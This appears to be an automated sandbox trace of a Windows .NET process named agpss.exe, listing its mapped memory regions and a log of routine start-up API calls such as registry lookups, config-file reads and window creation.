filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll")
Region:
id = 3132
start_va = 0x74170000
end_va = 0x741f3fff
monitored = 0
entry_point = 0x741719a9
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll")
Region:
id = 3133
start_va = 0xda0000
end_va = 0xe7ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000da0000"
filename = ""
Region:
id = 3135
start_va = 0x280000
end_va = 0x28ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000280000"
filename = ""
Region:
id = 3136
start_va = 0x470000
end_va = 0x47ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000470000"
filename = ""
Region:
id = 3137
start_va = 0x4c0000
end_va = 0x4cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000004c0000"
filename = ""
Region:
id = 3138
start_va = 0x73fe0000
end_va = 0x7416ffff
monitored = 0
entry_point = 0x7407d026
region_type = mapped_file
name = "gdiplus.dll"
filename = "\\Windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\\gdiplus.dll")
Region:
id = 3139
start_va = 0x4c0000
end_va = 0x4effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000004c0000"
filename = ""
Region:
id = 3140
start_va = 0x4c0000
end_va = 0x4dbfff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "gdipfontcachev1.dat"
filename = "\\Users\\kEecfMwgj\\AppData\\Local\\GDIPFONTCACHEV1.DAT" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\gdipfontcachev1.dat")
Region:
id = 3141
start_va = 0x4e0000
end_va = 0x4effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000004e0000"
filename = ""
Region:
id = 3142
start_va = 0xdb0000
end_va = 0xdeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000db0000"
filename = ""
Region:
id = 3143
start_va = 0xe70000
end_va = 0xe7ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000e70000"
filename = ""
Region:
id = 3144
start_va = 0x4e30000
end_va = 0x4f2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004e30000"
filename = ""
Region:
id = 3145
start_va = 0x7efaa000
end_va = 0x7efacfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efaa000"
filename = ""
Region:
id = 3146
start_va = 0x48e0000
end_va = 0x49dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000048e0000"
filename = ""
Region:
id = 3147
start_va = 0x49f0000
end_va = 0x4a2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000049f0000"
filename = ""
Region:
id = 3148
start_va = 0x4f30000
end_va = 0x4fdafff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tahoma.ttf"
filename = "\\Windows\\Fonts\\tahoma.ttf" (normalized: "c:\\windows\\fonts\\tahoma.ttf")
Region:
id = 3149
start_va = 0x4f30000
end_va = 0x4fdafff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tahoma.ttf"
filename = "\\Windows\\Fonts\\tahoma.ttf" (normalized: "c:\\windows\\fonts\\tahoma.ttf")
Region:
id = 3150
start_va = 0x4f30000
end_va = 0x63d8fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "msjh.ttf"
filename = "\\Windows\\Fonts\\msjh.ttf" (normalized: "c:\\windows\\fonts\\msjh.ttf")
Region:
id = 3151
start_va = 0x4f30000
end_va = 0x63d8fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "msjh.ttf"
filename = "\\Windows\\Fonts\\msjh.ttf" (normalized: "c:\\windows\\fonts\\msjh.ttf")
Region:
id = 3152
start_va = 0x4f30000
end_va = 0x63f2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "msyh.ttf"
filename = "\\Windows\\Fonts\\msyh.ttf" (normalized: "c:\\windows\\fonts\\msyh.ttf")
Region:
id = 3153
start_va = 0x4f30000
end_va = 0x63f2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "msyh.ttf"
filename = "\\Windows\\Fonts\\msyh.ttf" (normalized: "c:\\windows\\fonts\\msyh.ttf")
Region:
id = 3154
start_va = 0x4f30000
end_va = 0x5352fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "malgun.ttf"
filename = "\\Windows\\Fonts\\malgun.ttf" (normalized: "c:\\windows\\fonts\\malgun.ttf")
Region:
id = 3155
start_va = 0x4f30000
end_va = 0x5352fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "malgun.ttf"
filename = "\\Windows\\Fonts\\malgun.ttf" (normalized: "c:\\windows\\fonts\\malgun.ttf")
Region:
id = 3156
start_va = 0x4d90000
end_va = 0x4e2ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "micross.ttf"
filename = "\\Windows\\Fonts\\micross.ttf" (normalized: "c:\\windows\\fonts\\micross.ttf")
Region:
id = 3157
start_va = 0x4d90000
end_va = 0x4e2ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "micross.ttf"
filename = "\\Windows\\Fonts\\micross.ttf" (normalized: "c:\\windows\\fonts\\micross.ttf")
Region:
id = 3158
start_va = 0xbb0000
end_va = 0xc2efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "segoeui.ttf"
filename = "\\Windows\\Fonts\\segoeui.ttf" (normalized: "c:\\windows\\fonts\\segoeui.ttf")
Region:
id = 3159
start_va = 0xbb0000
end_va = 0xc2efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "segoeui.ttf"
filename = "\\Windows\\Fonts\\segoeui.ttf" (normalized: "c:\\windows\\fonts\\segoeui.ttf")
Region:
id = 3160
start_va = 0x4f30000
end_va = 0x512ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004f30000"
filename = ""
Region:
id = 3161
start_va = 0x5130000
end_va = 0x520ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005130000"
filename = ""
Region:
id = 3162
start_va = 0x5210000
end_va = 0x52ccfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "arial.ttf"
filename = "\\Windows\\Fonts\\arial.ttf" (normalized: "c:\\windows\\fonts\\arial.ttf")
Region:
id = 3163
start_va = 0x5210000
end_va = 0x52ccfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "arial.ttf"
filename = "\\Windows\\Fonts\\arial.ttf" (normalized: "c:\\windows\\fonts\\arial.ttf")
Region:
id = 3164
start_va = 0x5210000
end_va = 0x52c6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "arialbd.ttf"
filename = "\\Windows\\Fonts\\arialbd.ttf" (normalized: "c:\\windows\\fonts\\arialbd.ttf")
Region:
id = 3165
start_va = 0x5210000
end_va = 0x52c6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "arialbd.ttf"
filename = "\\Windows\\Fonts\\arialbd.ttf" (normalized: "c:\\windows\\fonts\\arialbd.ttf")
Region:
id = 3166
start_va = 0xbb0000
end_va = 0xc37fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ariali.ttf"
filename = "\\Windows\\Fonts\\ariali.ttf" (normalized: "c:\\windows\\fonts\\ariali.ttf")
Region:
id = 3167
start_va = 0xbb0000
end_va = 0xc37fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ariali.ttf"
filename = "\\Windows\\Fonts\\ariali.ttf" (normalized: "c:\\windows\\fonts\\ariali.ttf")
Region:
id = 3168
start_va = 0xbb0000
end_va = 0xc39fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "arialbi.ttf"
filename = "\\Windows\\Fonts\\arialbi.ttf" (normalized: "c:\\windows\\fonts\\arialbi.ttf")
Region:
id = 3169
start_va = 0xbb0000
end_va = 0xc39fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "arialbi.ttf"
filename = "\\Windows\\Fonts\\arialbi.ttf" (normalized: "c:\\windows\\fonts\\arialbi.ttf")
Region:
id = 3170
start_va = 0x5210000
end_va = 0x5b3ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "staticcache.dat"
filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat")
Region:
id = 3171
start_va = 0x280000
end_va = 0x280fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000280000"
filename = ""
Region:
id = 3172
start_va = 0x6f890000
end_va = 0x6fcabfff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "windowsbase.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\WindowsBase\\1a4cc316fb6d09525321fc0be44692d8\\WindowsBase.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\windowsbase\\1a4cc316fb6d09525321fc0be44692d8\\windowsbase.ni.dll")
Region:
id = 3173
start_va = 0x6ec50000
end_va = 0x6f88bfff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "presentationcore.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\PresentationCore\\468f4e17be144ca12a73a4297eacc9cc\\PresentationCore.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\presentationcore\\468f4e17be144ca12a73a4297eacc9cc\\presentationcore.ni.dll")
Region:
id = 3174
start_va = 0x6d860000
end_va = 0x6ec42fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "presentationframework.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Presentatio5ae0f00f#\\252cc7b0fae8cfe083bdc149957c0c54\\PresentationFramework.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\presentatio5ae0f00f#\\252cc7b0fae8cfe083bdc149957c0c54\\presentationframework.ni.dll")
Region:
id = 3175
start_va = 0xbb0000
end_va = 0xc11fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "mscorrc.dll"
filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorrc.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscorrc.dll")
Region:
id = 3176
start_va = 0x470000
end_va = 0x47ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000470000"
filename = ""
Region:
id = 3177
start_va = 0x4c0000
end_va = 0x4cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000004c0000"
filename = ""
Region:
id = 3178
start_va = 0x4d0000
end_va = 0x4dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000004d0000"
filename = ""
Region:
id = 3179
start_va = 0x4f0000
end_va = 0x4fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000004f0000"
filename = ""
Region:
id = 3180
start_va = 0x4d0000
end_va = 0x4dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000004d0000"
filename = ""
Region:
id = 3181
start_va = 0x4f0000
end_va = 0x4fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000004f0000"
filename = ""
Region:
id = 3182
start_va = 0x500000
end_va = 0x50ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000500000"
filename = ""
Region:
id = 3183
start_va = 0x4d0000
end_va = 0x4dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000004d0000"
filename = ""
Region:
id = 3184
start_va = 0x4dd0000
end_va = 0x4e0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004dd0000"
filename = ""
Region:
id = 3185
start_va = 0x5ba0000
end_va = 0x5c9ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005ba0000"
filename = ""
Region:
id = 3186
start_va = 0x7efa7000
end_va = 0x7efa9fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efa7000"
filename = ""
Region:
id = 3187
start_va = 0x5ca0000
end_va = 0x6c9ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005ca0000"
filename = ""
Region:
id = 3188
start_va = 0x6ca0000
end_va = 0x6deffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006ca0000"
filename = ""
Region:
id = 3189
start_va = 0x6df0000
end_va = 0x7deffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006df0000"
filename = ""
Region:
id = 3190
start_va = 0x7df0000
end_va = 0x808ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007df0000"
filename = ""
Region:
id = 3191
start_va = 0x4d0000
end_va = 0x4dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000004d0000"
filename = ""
Region:
id = 3192
start_va = 0x4d0000
end_va = 0x4dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000004d0000"
filename = ""
Region:
id = 3323
start_va = 0x80a0000
end_va = 0x80dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000080a0000"
filename = ""
Region:
id = 3324
start_va = 0x81a0000
end_va = 0x829ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000081a0000"
filename = ""
Region:
id = 3325
start_va = 0x7efa4000
end_va = 0x7efa6fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efa4000"
filename = ""
Thread:
id = 87
os_tid = 0x730
[0262.212] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0
[0266.835] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\AppContext", ulOptions=0x0, samDesired=0x20019, phkResult=0x38e800 | out: phkResult=0x38e800*=0x0) returned 0x2
[0266.835] RegCloseKey (hKey=0x80000002) returned 0x0
[0266.847] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Windows.Forms\\v4.0_4.0.0.0__b77a5c561934e089\\System.Windows.Forms.dll", nBufferLength=0x105, lpBuffer=0x38ea84, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Windows.Forms\\v4.0_4.0.0.0__b77a5c561934e089\\System.Windows.Forms.dll", lpFilePart=0x0) returned 0x77
[0266.901] IsAppThemed () returned 0x1
[0266.911] CoTaskMemAlloc (cb=0xf0) returned 0x7693e8
[0266.912] CreateActCtxA (pActCtx=0x38efa8) returned 0x76de0c
[0267.043] CoTaskMemFree (pv=0x7693e8)
[0267.085] RegisterClipboardFormatW (lpszFormat="WM_GETCONTROLNAME") returned 0xc104
[0267.085] RegisterClipboardFormatW (lpszFormat="WM_GETCONTROLTYPE") returned 0xc105
[0267.739] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\AGP Subsystem\\agpss.exe.config", nBufferLength=0x105, lpBuffer=0x38e900, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\AGP Subsystem\\agpss.exe.config", lpFilePart=0x0) returned 0x35
[0268.065] GetCurrentProcess () returned 0xffffffff
[0268.066] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x38ec38 | out: TokenHandle=0x38ec38*=0x1f0) returned 1
[0268.073] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", nBufferLength=0x105, lpBuffer=0x38e6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", lpFilePart=0x0) returned 0x2e
[0268.124] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x38ec30 | out: lpFileInformation=0x38ec30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc63fb400, ftCreationTime.dwHighDateTime=0x1d4e4ee, ftLastAccessTime.dwLowDateTime=0xb9f350b0, ftLastAccessTime.dwHighDateTime=0x1d706ae, ftLastWriteTime.dwLowDateTime=0xc63fb400, ftLastWriteTime.dwHighDateTime=0x1d4e4ee, nFileSizeHigh=0x0, nFileSizeLow=0x8c8e)) returned 1
[0268.126] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x38e6bc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x43
[0268.126] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x38ec38 | out: lpFileInformation=0x38ec38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc63fb400, ftCreationTime.dwHighDateTime=0x1d4e4ee, ftLastAccessTime.dwLowDateTime=0xb9f350b0, ftLastAccessTime.dwHighDateTime=0x1d706ae, ftLastWriteTime.dwLowDateTime=0xc63fb400, ftLastWriteTime.dwHighDateTime=0x1d4e4ee, nFileSizeHigh=0x0, nFileSizeLow=0x8c8e)) returned 1
[0268.129] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x38e658, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x43
[0268.131] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38eb70) returned 1
[0268.132] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x40
[0268.133] GetFileType (hFile=0x40) returned 0x1
[0268.133] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38eb6c) returned 1
[0268.133] GetFileType (hFile=0x40) returned 0x1
[0268.457] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", nBufferLength=0x105, lpBuffer=0x38dea8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", lpFilePart=0x0) returned 0x43
[0268.457] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", nBufferLength=0x105, lpBuffer=0x38df0c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", lpFilePart=0x0) returned 0x43
[0268.458] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38e14c) returned 1
[0268.458] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x38e410 | out: lpFileInformation=0x38e410*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc63fb400, ftCreationTime.dwHighDateTime=0x1d4e4ee, ftLastAccessTime.dwLowDateTime=0xb9f350b0, ftLastAccessTime.dwHighDateTime=0x1d706ae, ftLastWriteTime.dwLowDateTime=0xc63fb400, ftLastWriteTime.dwHighDateTime=0x1d4e4ee, nFileSizeHigh=0x0, nFileSizeLow=0x8c8e)) returned 1
[0268.458] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38e148) returned 1
[0268.667] BCryptGetFipsAlgorithmMode (in: pfEnabled=0x38e2dc | out: pfEnabled=0x38e2dc) returned 0x0
[0268.774] GetFileSize (in: hFile=0x40, lpFileSizeHigh=0x38ec2c | out: lpFileSizeHigh=0x38ec2c*=0x0) returned 0x8c8e
[0268.776] ReadFile (in: hFile=0x40, lpBuffer=0x23dffac, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38ebe8, lpOverlapped=0x0 | out: lpBuffer=0x23dffac*, lpNumberOfBytesRead=0x38ebe8*=0x1000, lpOverlapped=0x0) returned 1
[0268.804] ReadFile (in: hFile=0x40, lpBuffer=0x23dffac, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38ea98, lpOverlapped=0x0 | out: lpBuffer=0x23dffac*, lpNumberOfBytesRead=0x38ea98*=0x1000, lpOverlapped=0x0) returned 1
[0268.806] ReadFile (in: hFile=0x40, lpBuffer=0x23dffac, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38e94c, lpOverlapped=0x0 | out: lpBuffer=0x23dffac*, lpNumberOfBytesRead=0x38e94c*=0x1000, lpOverlapped=0x0) returned 1
[0268.807] ReadFile (in: hFile=0x40, lpBuffer=0x23dffac, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38e94c, lpOverlapped=0x0 | out: lpBuffer=0x23dffac*, lpNumberOfBytesRead=0x38e94c*=0x1000, lpOverlapped=0x0) returned 1
[0268.808] ReadFile (in: hFile=0x40, lpBuffer=0x23dffac, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38e94c, lpOverlapped=0x0 | out: lpBuffer=0x23dffac*, lpNumberOfBytesRead=0x38e94c*=0x1000, lpOverlapped=0x0) returned 1
[0268.808] ReadFile (in: hFile=0x40, lpBuffer=0x23dffac, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38e884, lpOverlapped=0x0 | out: lpBuffer=0x23dffac*, lpNumberOfBytesRead=0x38e884*=0x1000, lpOverlapped=0x0) returned 1
[0268.817] ReadFile (in: hFile=0x40, lpBuffer=0x23dffac, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38e9f0, lpOverlapped=0x0 | out: lpBuffer=0x23dffac*, lpNumberOfBytesRead=0x38e9f0*=0x1000, lpOverlapped=0x0) returned 1
[0268.819] ReadFile (in: hFile=0x40, lpBuffer=0x23dffac, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38e8e4, lpOverlapped=0x0 | out: lpBuffer=0x23dffac*, lpNumberOfBytesRead=0x38e8e4*=0x1000, lpOverlapped=0x0) returned 1
[0268.820] ReadFile (in: hFile=0x40, lpBuffer=0x23dffac, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38e8e4, lpOverlapped=0x0 | out: lpBuffer=0x23dffac*, lpNumberOfBytesRead=0x38e8e4*=0xc8e, lpOverlapped=0x0) returned 1
[0268.820] ReadFile (in: hFile=0x40, lpBuffer=0x23dffac, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38e9a8, lpOverlapped=0x0 | out: lpBuffer=0x23dffac*, lpNumberOfBytesRead=0x38e9a8*=0x0, lpOverlapped=0x0) returned 1
[0268.820] CloseHandle (hObject=0x40) returned 1
[0268.821] CloseHandle (hObject=0x1f0) returned 1
[0268.822] GetCurrentProcess () returned 0xffffffff
[0268.822] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x38ed84 | out: TokenHandle=0x38ed84*=0x1f0) returned 1
[0268.823] CloseHandle (hObject=0x1f0) returned 1
[0268.824] GetCurrentProcess () returned 0xffffffff
[0268.824] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x38ed84 | out: TokenHandle=0x38ed84*=0x1f0) returned 1
[0268.825] CloseHandle (hObject=0x1f0) returned 1
[0268.838] GetCurrentProcess () returned 0xffffffff
[0268.839] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x38ec38 | out: TokenHandle=0x38ec38*=0x1f0) returned 1
[0268.839] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\AGP Subsystem\\agpss.exe.config" (normalized: "c:\\program files (x86)\\agp subsystem\\agpss.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x38ec30 | out: lpFileInformation=0x38ec30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0268.840] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\AGP Subsystem\\agpss.exe.config", nBufferLength=0x105, lpBuffer=0x38e6bc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\AGP Subsystem\\agpss.exe.config", lpFilePart=0x0) returned 0x35
[0268.840] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\AGP Subsystem\\agpss.exe.config" (normalized: "c:\\program files (x86)\\agp subsystem\\agpss.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x38ec38 | out: lpFileInformation=0x38ec38*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0268.841] CloseHandle (hObject=0x1f0) returned 1
[0268.841] GetCurrentProcess () returned 0xffffffff
[0268.841] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x38ed84 | out: TokenHandle=0x38ed84*=0x1f0) returned 1
[0268.842] CloseHandle (hObject=0x1f0) returned 1
[0268.844] GetCurrentProcess () returned 0xffffffff
[0268.844] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x38ed84 | out: TokenHandle=0x38ed84*=0x1f0) returned 1
[0268.845] CloseHandle (hObject=0x1f0) returned 1
[0268.868] GetCurrentProcess () returned 0xffffffff
[0268.868] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x38eb9c | out: TokenHandle=0x38eb9c*=0x1f0) returned 1
[0268.887] CloseHandle (hObject=0x1f0) returned 1
[0268.887] GetCurrentProcess () returned 0xffffffff
[0268.888] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x38ebb4 | out: TokenHandle=0x38ebb4*=0x1f0) returned 1
[0268.898] CloseHandle (hObject=0x1f0) returned 1
[0268.904] GetSystemMetrics (nIndex=75) returned 1
[0268.911] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x0
[0268.923] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b80000
[0268.926] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="AddDllDirectory", cchWideChar=15, lpMultiByteStr=0x38ee80, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AddDllDirectory", lpUsedDefaultChar=0x0) returned 15
[0268.926] GetProcAddress (hModule=0x76b80000, lpProcName="AddDllDirectory") returned 0x75171e91
[0268.927] LoadLibraryExW (lpLibFileName="comctl32.dll", hFile=0x0, dwFlags=0x800) returned 0x74170000
[0268.958] AdjustWindowRectEx (in: lpRect=0x38efe8, dwStyle=0x56cf0000, bMenu=0, dwExStyle=0x50001 | out: lpRect=0x38efe8) returned 1
[0268.964] GetCurrentProcess () returned 0xffffffff
[0268.964] GetCurrentThread () returned 0xfffffffe
[0268.964] GetCurrentProcess () returned 0xffffffff
[0268.964] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x38ef00, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x38ef00*=0x40) returned 1
[0268.967] GetCurrentThreadId () returned 0x730
[0268.983] GetCurrentActCtx (in: lphActCtx=0x38ee60 | out: lphActCtx=0x38ee60*=0x0) returned 1
[0268.984] ActivateActCtx (in: hActCtx=0x76de0c, lpCookie=0x38ee70 | out: hActCtx=0x76de0c, lpCookie=0x38ee70) returned 1
[0268.986] GetModuleHandleW (lpModuleName="user32.dll") returned 0x76c90000
